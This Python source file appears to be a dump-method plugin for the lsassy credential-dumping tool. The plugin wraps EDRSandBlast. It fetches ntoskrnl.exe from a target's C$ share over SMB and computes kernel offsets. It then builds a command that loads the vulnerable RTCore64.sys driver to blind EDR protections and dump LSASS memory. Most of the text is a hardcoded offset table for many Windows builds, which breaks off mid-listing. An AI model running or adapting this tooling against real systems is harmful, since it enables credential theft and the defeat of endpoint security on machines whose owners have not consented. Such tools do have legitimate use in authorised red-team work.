"""
https://github.com/wavestone-cdt/EDRSandblast
"""

import logging
import os
import random
import string
import subprocess

from lsassy.dumpmethod import IDumpMethod, Dependency


class DumpMethod(IDumpMethod):
    def __init__(self, session, timeout, time_between_commands):
        super().__init__(session, timeout, time_between_commands)
        self.edrsandblast = Dependency("edrsandblast", "EDRSandBlast.exe")
        self.RTCore64 = Dependency("RTCore64", "RTCore64.sys")
        self.ntoskrnl = Dependency("ntoskrnl", "NtoskrnlOffsets.csv")

        self.tmp_ntoskrnl = "lsassy_" + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32)) + ".exe"

    def prepare(self, options):
        if os.name == 'nt':
            tmp_dir = 'C:\\Windows\\Temp\\'
        else:
            tmp_dir = '/tmp/'
        with open('{}{}'.format(tmp_dir, self.tmp_ntoskrnl), 'wb') as p:
            try:
                self._session.smb_session.getFile("C$", "\\Windows\\System32\\ntoskrnl.exe", p.write)
                logging.success("ntoskrnl.exe downloaded to {}{}".format(tmp_dir, self.tmp_ntoskrnl))
            except Exception as e:
                logging.error("ntoskrnl.exe download error", exc_info=True)
                try:
                    os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl))
                except Exception as e:
                    return None
                return None
        self.ntoskrnl.content = self.get_offsets("{}{}".format(tmp_dir, self.tmp_ntoskrnl))

        if self.ntoskrnl.content is not None:
            logging.success("ntoskrnl offsets extracted")
            logging.debug(self.ntoskrnl.content.split("\n")[1])
        os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl))

        return self.prepare_dependencies(options, [self.edrsandblast, self.RTCore64, self.ntoskrnl])

    def clean(self):
        self.clean_dependencies([self.edrsandblast, self.RTCore64, self.ntoskrnl])

    def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
        cmd_command = """{} dump --usermode --kernelmode --driver {} --nt-offsets {} -o {}{}""".format(
            self.edrsandblast.get_remote_path(),
            self.RTCore64.get_remote_path(),
            self.ntoskrnl.get_remote_path(),
            self.dump_path, self.dump_name
        )

        return {
            "cmd": cmd_command,
            "pwsh": cmd_command
        }

    def run(self, args, **kargs):
        return subprocess.run(args, shell=False, **kargs)

    def get_symbol_offset(self, symbols_info, symbol_name):
        for line in symbols_info:
            # sometimes, a "_" is prepended to the symbol name ...
            if line.strip().split(" ")[-1].endswith(symbol_name):
                return int(line.split(" ")[0], 16)
        else:
            return 0

    def get_field_offset(self, symbols_info, field_name):
        for line in symbols_info:
            if field_name in line:
                assert "offset" in line
                symbol_offset = int(line.split("+")[-1], 16)
                return symbol_offset
        else:
            return 0

    def get_file_version(self, path):
        # dump version number using r2
        r = self.run(["r2", "-c", "iV", "-qq", path], capture_output=True)
        for line in r.stdout.decode().splitlines():
            line = line.strip()
            if line.startswith("FileVersion:"):
                return [int(frag) for frag in line.split(" ")[-1].split(".")]
        return False

    def extractOffsets(self, input_file):
        known_offsets = {
            "ntoskrnl_9600-20111.exe": ["2dac50", "2daa50", "2da850", "67a", "0", "20", "50"],
            "ntoskrnl_10240-16384.exe": ["35d2e0", "35d0e0", "35cee0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17394.exe": ["35d420", "35d220", "35d020", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17443.exe": ["35c420", "35c220", "35c020", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17446.exe": ["35c420", "35c220", "35c020", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17488.exe": ["35c3e0", "35c1e0", "35bfe0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17533.exe": ["35c3e0", "35c1e0", "35bfe0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17609.exe": ["35c3e0", "35c1e0", "35bfe0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17643.exe": ["35c3e0", "35c1e0", "35bfe0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17709.exe": ["35c3e0", "35c1e0", "35bfe0", "6aa", "0", "20", "50"],
            "ntoskrnl_10240-17738.exe": ["366520", "366320", "366120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17770.exe": ["366520", "366320", "366120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17797.exe": ["366520", "366320", "366120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17831.exe": ["366520", "366320", "366120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17861.exe": ["3664e0", "3662e0", "3660e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17889.exe": ["3644e0", "3642e0", "3640e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17914.exe": ["3644e0", "3642e0", "3640e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-17976.exe": ["3694e0", "3692e0", "3690e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18005.exe": ["3694e0", "3692e0", "3690e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18036.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18063.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18094.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18132.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18158.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18275.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18303.exe": ["369520", "369320", "369120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18427.exe": ["367520", "367320", "367120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18452.exe": ["367520", "367320", "367120", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18485.exe": ["3684e0", "3682e0", "3680e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18545.exe": ["3684e0", "3682e0", "3680e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18575.exe": ["3684e0", "3682e0", "3680e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18608.exe": ["3684e0", "3682e0", "3680e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18638.exe": ["3684e0", "3682e0", "3680e0", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18666.exe": ["367560", "367360", "367160", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18725.exe": ["367560", "367360", "367160", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18756.exe": ["367560", "367360", "367160", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18841.exe": ["367560", "367360", "367160", "6b2", "0", "20", "50"],
            "ntoskrnl_10240-18906.exe": ["367560", "367360", "367160", "6b2", "0", "20", "50"],
            "ntoskrnl_10586-0.exe": ["317180", "316f80", "316d80", "6b2", "0", "20", "50"],
            "ntoskrnl_10586-1176.exe": ["3161c0", "315fc0", "315dc0", "6b2", "0", "20", "50"],
            "ntoskrnl_10586-1177.exe": ["3161c0", "315fc0", "315dc0", "6b2", "0", "20", "50"],
            "ntoskrnl_10586-1295.exe": ["3161c0", "315fc0", "315dc0", "6b2", "0", "20", "50"],
            "ntoskrnl_10586-1356.exe": ["31a2c0", "31a0c0", "319ec0", "6ba", "0", "20", "50"],
            "ntoskrnl_10586-1417.exe": ["31a2c0", "31a0c0", "319ec0", "6ba", "0", "20", "50"],
            "ntoskrnl_10586-1478.exe": ["31a2c0", "31a0c0", "319ec0", "6ba", "0", "20", "50"],
            "ntoskrnl_10586-1540.exe": ["31a300", "31a100", "319f00", "6ba", "0", "20", "50"],
            "ntoskrnl_14393-0.exe": ["33bba0", "33b9a0", "33b7a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-1198.exe": ["335860", "335660", "335460", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-1532.exe": ["3348a0", "3346a0", "3344a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-1670.exe": ["3348a0", "3346a0", "3344a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-1737.exe": ["3348a0", "3346a0", "3344a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-1770.exe": ["3348a0", "3346a0", "3344a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-2189.exe": ["33ea20", "33e820", "33e620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2214.exe": ["33ea20", "33e820", "33e620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2248.exe": ["33da60", "33d860", "33d660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2273.exe": ["33da60", "33d860", "33d660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2312.exe": ["33ca20", "33c820", "33c620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2363.exe": ["33ca20", "33c820", "33c620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2395.exe": ["33bb60", "33b960", "33b760", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2430.exe": ["338b60", "338960", "338760", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2485.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2551.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2580.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2608.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2636.exe": ["338be0", "3389e0", "3387e0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2665.exe": ["338be0", "3389e0", "3387e0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2724.exe": ["338be0", "3389e0", "3387e0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2791.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2848.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2906.exe": ["338b20", "338920", "338720", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-2969.exe": ["339a20", "339820", "339620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3085.exe": ["339a20", "339820", "339620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3115.exe": ["339a20", "339820", "339620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3143.exe": ["339a20", "339820", "339620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3204.exe": ["339a20", "339820", "339620", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3241.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3269.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3297.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3321.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3383.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3442.exe": ["339a60", "339860", "339660", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3471.exe": ["33ae60", "33ac60", "33aa60", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3503.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3541.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3564.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3595.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3630.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3659.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3686.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3750.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3755.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3808.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3866.exe": ["33ae60", "33ac60", "33aa60", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3930.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-3986.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4046.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4104.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4169.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4225.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4283.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4350.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4402.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4467.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4470.exe": ["33aee0", "33ace0", "33aae0", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4530.exe": ["33ae60", "33ac60", "33aa60", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4583.exe": ["33ae60", "33ac60", "33aa60", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-4651.exe": ["33ae60", "33ac60", "33aa60", "6ca", "0", "20", "50"],
            "ntoskrnl_14393-576.exe": ["33bca0", "33baa0", "33b8a0", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-726.exe": ["335860", "335660", "335460", "6c2", "0", "20", "50"],
            "ntoskrnl_14393-953.exe": ["335860", "335660", "335460", "6c2", "0", "20", "50"],
            "ntoskrnl_15063-0.exe": ["382290", "382090", "381e90", "6ca", "341ea8", "20", "50"],
            "ntoskrnl_15063-1029.exe": ["389550", "389350", "389150", "6ca", "348fa8", "20", "50"],
            "ntoskrnl_15063-1088.exe": ["3894d0", "3892d0", "3890d0", "6ca", "348fb8", "20", "50"],
            "ntoskrnl_15063-1155.exe": ["387510", "387310", "387110", "6ca", "346f68", "20", "50"],
            "ntoskrnl_15063-1206.exe": ["387510", "387310", "387110", "6ca", "346f68", "20", "50"],
            "ntoskrnl_15063-1266.exe": ["384410", "384210", "384010", "6ca", "343f48", "20", "50"],
            "ntoskrnl_15063-13.exe": ["382290", "382090", "381e90", "6ca", "341ea8", "20", "50"],
            "ntoskrnl_15063-1324.exe": ["385490", "385290", "385090", "6ca", "344f88", "20", "50"],
            "ntoskrnl_15063-1387.exe": ["385490", "385290", "385090", "6ca", "344f98", "20", "50"],
            "ntoskrnl_15063-1418.exe": ["385490", "385290", "385090", "6ca", "344f98", "20", "50"],
            "ntoskrnl_15063-1446.exe": ["385490", "385290", "385090", "6ca", "344fa8", "20", "50"],
            "ntoskrnl_15063-1478.exe": ["385450", "385250", "385050", "6ca", "344f68", "20", "50"],
            "ntoskrnl_15063-1563.exe": ["385450", "385250", "385050", "6ca", "344f68", "20", "50"],
            "ntoskrnl_15063-1596.exe": ["385450", "385250", "385050", "6ca", "344f68", "20", "50"],
            "ntoskrnl_15063-1631.exe": ["385450", "385250", "385050", "6ca", "344f68", "20", "50"],
            "ntoskrnl_15063-1689.exe": ["3854d0", "3852d0", "3850d0", "6ca", "344fd8", "20", "50"],
            "ntoskrnl_15063-1746.exe": ["3854d0", "3852d0", "3850d0", "6ca", "344fd8", "20", "50"],
            "ntoskrnl_15063-1805.exe": ["3853d0", "3851d0", "384fd0", "6ca", "344e78", "20", "50"],
            "ntoskrnl_15063-1928.exe": ["385450", "385250", "385050", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-1987.exe": ["385450", "385250", "385050", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-2017.exe": ["385450", "385250", "385050", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-2045.exe": ["385350", "385150", "384f50", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-2076.exe": ["385350", "385150", "384f50", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-2106.exe": ["385350", "385150", "384f50", "6ca", "344e48", "20", "50"],
            "ntoskrnl_15063-2283.exe": ["385410", "385210", "385010", "6ca", "344e68", "20", "50"],
            "ntoskrnl_15063-296.exe": ["382290", "382090", "381e90", "6ca", "341ea8", "20", "50"],
            "ntoskrnl_15063-674.exe": ["3822d0", "3820d0", "381ed0", "6ca", "341e88", "20", "50"],
            "ntoskrnl_15063-675.exe": ["3822d0", "3820d0", "381ed0", "6ca", "341e88", "20", "50"],
            "ntoskrnl_15063-786.exe": ["382310", "382110", "381f10", "6ca", "341ec8", "20", "50"],
            "ntoskrnl_15063-850.exe": ["389450", "389250", "389050", "6ca", "348fb8", "20", "50"],
            "ntoskrnl_15063-909.exe": ["389510", "389310", "389110", "6ca", "348fa8", "20", "50"],
            "ntoskrnl_15063-966.exe": ["389550", "389350", "389150", "6ca", "348fa8", "20", "50"],
            "ntoskrnl_16299-1004.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-1029.exe": ["39ff00", "3a0100", "39fd00", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-1087.exe": ["39ff00", "3a0100", "39fd00", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-1120.exe": ["39ff00", "3a0100", "39fd00", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-1146.exe": ["3a0d00", "3a0f00", "3a0b00", "6ca", "35e8a0", "20", "50"],
            "ntoskrnl_16299-1182.exe": ["3a0d00", "3a0f00", "3a0b00", "6ca", "35e8a0", "20", "50"],
            "ntoskrnl_16299-1217.exe": ["3a1000", "3a0c00", "3a0e00", "6ca", "35e968", "20", "50"],
            "ntoskrnl_16299-125.exe": ["398a80", "398c80", "398e80", "6ca", "356980", "20", "50"],
            "ntoskrnl_16299-1331.exe": ["3a1000", "3a0c00", "3a0e00", "6ca", "35e968", "20", "50"],
            "ntoskrnl_16299-1364.exe": ["3a1000", "3a0c00", "3a0e00", "6ca", "35e968", "20", "50"],
            "ntoskrnl_16299-1419.exe": ["3a1040", "3a0c40", "3a0e40", "6ca", "35e988", "20", "50"],
            "ntoskrnl_16299-1448.exe": ["3a1040", "3a0c40", "3a0e40", "6ca", "35e988", "20", "50"],
            "ntoskrnl_16299-15.exe": ["398c80", "398e80", "398a80", "6ca", "356908", "20", "50"],
            "ntoskrnl_16299-1622.exe": ["3a0fc0", "3a0bc0", "3a0dc0", "6ca", "35e988", "20", "50"],
            "ntoskrnl_16299-1747.exe": ["3a0cc0", "3a0ec0", "3a0ac0", "6ca", "35e8c0", "20", "50"],
            "ntoskrnl_16299-1775.exe": ["3a0cc0", "3a0ec0", "3a0ac0", "6ca", "35e8c0", "20", "50"],
            "ntoskrnl_16299-19.exe": ["398c80", "398e80", "398a80", "6ca", "3568e8", "20", "50"],
            "ntoskrnl_16299-192.exe": ["39dd40", "39df40", "39db40", "6ca", "35b980", "20", "50"],
            "ntoskrnl_16299-1992.exe": ["3a0cc0", "3a0ec0", "3a0ac0", "6ca", "35e8c0", "20", "50"],
            "ntoskrnl_16299-2045.exe": ["3a1100", "3a0d00", "3a0f00", "6ca", "35e988", "20", "50"],
            "ntoskrnl_16299-214.exe": ["39ddc0", "39dfc0", "39dbc0", "6ca", "35b980", "20", "50"],
            "ntoskrnl_16299-2166.exe": ["3a1100", "3a0d00", "3a0f00", "6ca", "35e988", "20", "50"],
            "ntoskrnl_16299-248.exe": ["39e100", "39dd00", "39df00", "6ca", "35bac8", "20", "50"],
            "ntoskrnl_16299-251.exe": ["39e100", "39dd00", "39df00", "6ca", "35bac8", "20", "50"],
            "ntoskrnl_16299-309.exe": ["39e0c0", "39dcc0", "39dec0", "6ca", "35bae8", "20", "50"],
            "ntoskrnl_16299-334.exe": ["39e0c0", "39dcc0", "39dec0", "6ca", "35bac8", "20", "50"],
            "ntoskrnl_16299-371.exe": ["39ce40", "39d040", "39cc40", "6ca", "35aa00", "20", "50"],
            "ntoskrnl_16299-402.exe": ["39d0c0", "39ccc0", "39cec0", "6ca", "35aaa8", "20", "50"],
            "ntoskrnl_16299-431.exe": ["39ce00", "39d000", "39cc00", "6ca", "35aa00", "20", "50"],
            "ntoskrnl_16299-461.exe": ["39d080", "39cc80", "39ce80", "6ca", "35aa88", "20", "50"],
            "ntoskrnl_16299-492.exe": ["39b080", "39ac80", "39ae80", "6ca", "358aa8", "20", "50"],
            "ntoskrnl_16299-522.exe": ["3a2f00", "3a3100", "3a2d00", "6ca", "360ac0", "20", "50"],
            "ntoskrnl_16299-547.exe": ["3a2f00", "3a3100", "3a2d00", "6ca", "360ac0", "20", "50"],
            "ntoskrnl_16299-551.exe": ["3a2f00", "3a3100", "3a2d00", "6ca", "360ac0", "20", "50"],
            "ntoskrnl_16299-579.exe": ["3a2f00", "3a3100", "3a2d00", "6ca", "360ac0", "20", "50"],
            "ntoskrnl_16299-611.exe": ["39fe00", "3a0000", "39fc00", "6ca", "35d9e0", "20", "50"],
            "ntoskrnl_16299-637.exe": ["39fe00", "3a0000", "39fc00", "6ca", "35d9e0", "20", "50"],
            "ntoskrnl_16299-64.exe": ["398c40", "398e40", "398a40", "6ca", "3568e8", "20", "50"],
            "ntoskrnl_16299-665.exe": ["39fe80", "3a0080", "39fc80", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-666.exe": ["39fe80", "3a0080", "39fc80", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-699.exe": ["39fdc0", "39ffc0", "39fbc0", "6ca", "35da00", "20", "50"],
            "ntoskrnl_16299-726.exe": ["39fdc0", "39ffc0", "39fbc0", "6ca", "35da00", "20", "50"],
            "ntoskrnl_16299-755.exe": ["3a0080", "39fc80", "39fe80", "6ca", "35da88", "20", "50"],
            "ntoskrnl_16299-785.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-820.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-846.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-904.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-967.exe": ["39fec0", "3a00c0", "39fcc0", "6ca", "35dac0", "20", "50"],
            "ntoskrnl_16299-98.exe": ["398ec0", "398ac0", "398cc0", "6ca", "356980", "20", "50"],
            "ntoskrnl_17134-1.exe": ["3f4ef0", "3f50f0", "3f4cf0", "6ca", "3b2120", "20", "50"],
            "ntoskrnl_17134-1006.exe": ["3e4ef0", "3e4af0", "3e4cf0", "6ca", "3a1fc8", "20", "50"],
            "ntoskrnl_17134-1038.exe": ["3e4db0", "3e4fb0", "3e4bb0", "6ca", "3a1fe0", "20", "50"],
            "ntoskrnl_17134-1067.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fb0", "20", "50"],
            "ntoskrnl_17134-1098.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fb0", "20", "50"],
            "ntoskrnl_17134-112.exe": ["3f1e30", "3f2030", "3f1c30", "6ca", "3af088", "20", "50"],
            "ntoskrnl_17134-1130.exe": ["3e4fb0", "3e4bb0", "3e4db0", "6ca", "3a1fb0", "20", "50"],
            "ntoskrnl_17134-1184.exe": ["3e4fb0", "3e4bb0", "3e4db0", "6ca", "3a1fb0", "20", "50"],
            "ntoskrnl_17134-1246.exe": ["3e4fb0", "3e4bb0", "3e4db0", "6ca", "3a1fb0", "20", "50"],
            "ntoskrnl_17134-1304.exe": ["3e4ef0", "3e4af0", "3e4cf0", "6ca", "3a1fe8", "20", "50"],
            "ntoskrnl_17134-1345.exe": ["3e4db0", "3e4fb0", "3e4bb0", "6ca", "3a1fe0", "20", "50"],
            "ntoskrnl_17134-1365.exe": ["3e4e30", "3e5030", "3e4c30", "6ca", "3a2000", "20", "50"],
            "ntoskrnl_17134-137.exe": ["3f1e30", "3f2030", "3f1c30", "6ca", "3af088", "20", "50"],
            "ntoskrnl_17134-1425.exe": ["3e4e30", "3e5030", "3e4c30", "6ca", "3a2000", "20", "50"],
            "ntoskrnl_17134-1488.exe": ["3e4db0", "3e4fb0", "3e4bb0", "6ca", "3a1fe0", "20", "50"],
            "ntoskrnl_17134-1550.exe": ["3e4db0", "3e4fb0", "3e4bb0", "6ca", "3a1fe0", "20", "50"],
            "ntoskrnl_17134-1610.exe": ["3e4db0", "3e4fb0", "3e4bb0", "6ca", "3a1fe0", "20", "50"],
            "ntoskrnl_17134-165.exe": ["3f1e30", "3f2030", "3f1c30", "6ca", "3af088", "20", "50"],
            "ntoskrnl_17134-167.exe": ["3f1e30", "3f2030", "3f1c30", "6ca", "3af088", "20", "50"],
            "ntoskrnl_17134-1726.exe": ["3e4ff0", "3e4bf0", "3e4df0", "6ca", "3a1f88", "20", "50"],
            "ntoskrnl_17134-1792.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-1845.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-1902.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-191.exe": ["3f2e30", "3f3030", "3f2c30", "6ca", "3b0088", "20", "50"],
            "ntoskrnl_17134-1967.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-2026.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-2087.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17134-2145.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1f88", "20", "50"],
            "ntoskrnl_17134-2208.exe": ["3e4f70", "3e4b70", "3e4d70", "6ca", "3a1f88", "20", "50"],
            "ntoskrnl_17134-228.exe": ["3e5ff0", "3e5bf0", "3e5df0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-254.exe": ["3e5ff0", "3e5bf0", "3e5df0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-285.exe": ["3e6030", "3e5c30", "3e5e30", "6ca", "3a3100", "20", "50"],
            "ntoskrnl_17134-286.exe": ["3e6030", "3e5c30", "3e5e30", "6ca", "3a3100", "20", "50"],
            "ntoskrnl_17134-320.exe": ["3e5eb0", "3e60b0", "3e5cb0", "6ca", "3a3120", "20", "50"],
            "ntoskrnl_17134-345.exe": ["3e5eb0", "3e60b0", "3e5cb0", "6ca", "3a3160", "20", "50"],
            "ntoskrnl_17134-376.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-407.exe": ["3e5f30", "3e5b30", "3e5d30", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-471.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-472.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-48.exe": ["3f5030", "3f4c30", "3f4e30", "6ca", "3b20e8", "20", "50"],
            "ntoskrnl_17134-523.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-556.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-590.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-619.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-648.exe": ["3e5fb0", "3e5bb0", "3e5db0", "6ca", "3a3108", "20", "50"],
            "ntoskrnl_17134-677.exe": ["3e4eb0", "3e50b0", "3e4cb0", "6ca", "3a2160", "20", "50"],
            "ntoskrnl_17134-706.exe": ["3e4eb0", "3e50b0", "3e4cb0", "6ca", "3a2160", "20", "50"],
            "ntoskrnl_17134-753.exe": ["3e4eb0", "3e50b0", "3e4cb0", "6ca", "3a2160", "20", "50"],
            "ntoskrnl_17134-765.exe": ["3e4ef0", "3e4af0", "3e4cf0", "6ca", "3a1f48", "20", "50"],
            "ntoskrnl_17134-766.exe": ["3e4ef0", "3e4af0", "3e4cf0", "6ca", "3a1f48", "20", "50"],
            "ntoskrnl_17134-799.exe": ["3e4f30", "3e4b30", "3e4d30", "6ca", "3a1f68", "20", "50"],
            "ntoskrnl_17134-81.exe": ["3f4f30", "3f5130", "3f4d30", "6ca", "3b2120", "20", "50"],
            "ntoskrnl_17134-829.exe": ["3e4f30", "3e4b30", "3e4d30", "6ca", "3a1f68", "20", "50"],
            "ntoskrnl_17134-83.exe": ["3f4f30", "3f5130", "3f4d30", "6ca", "3b2120", "20", "50"],
            "ntoskrnl_17134-858.exe": ["3e4f30", "3e4b30", "3e4d30", "6ca", "3a1f68", "20", "50"],
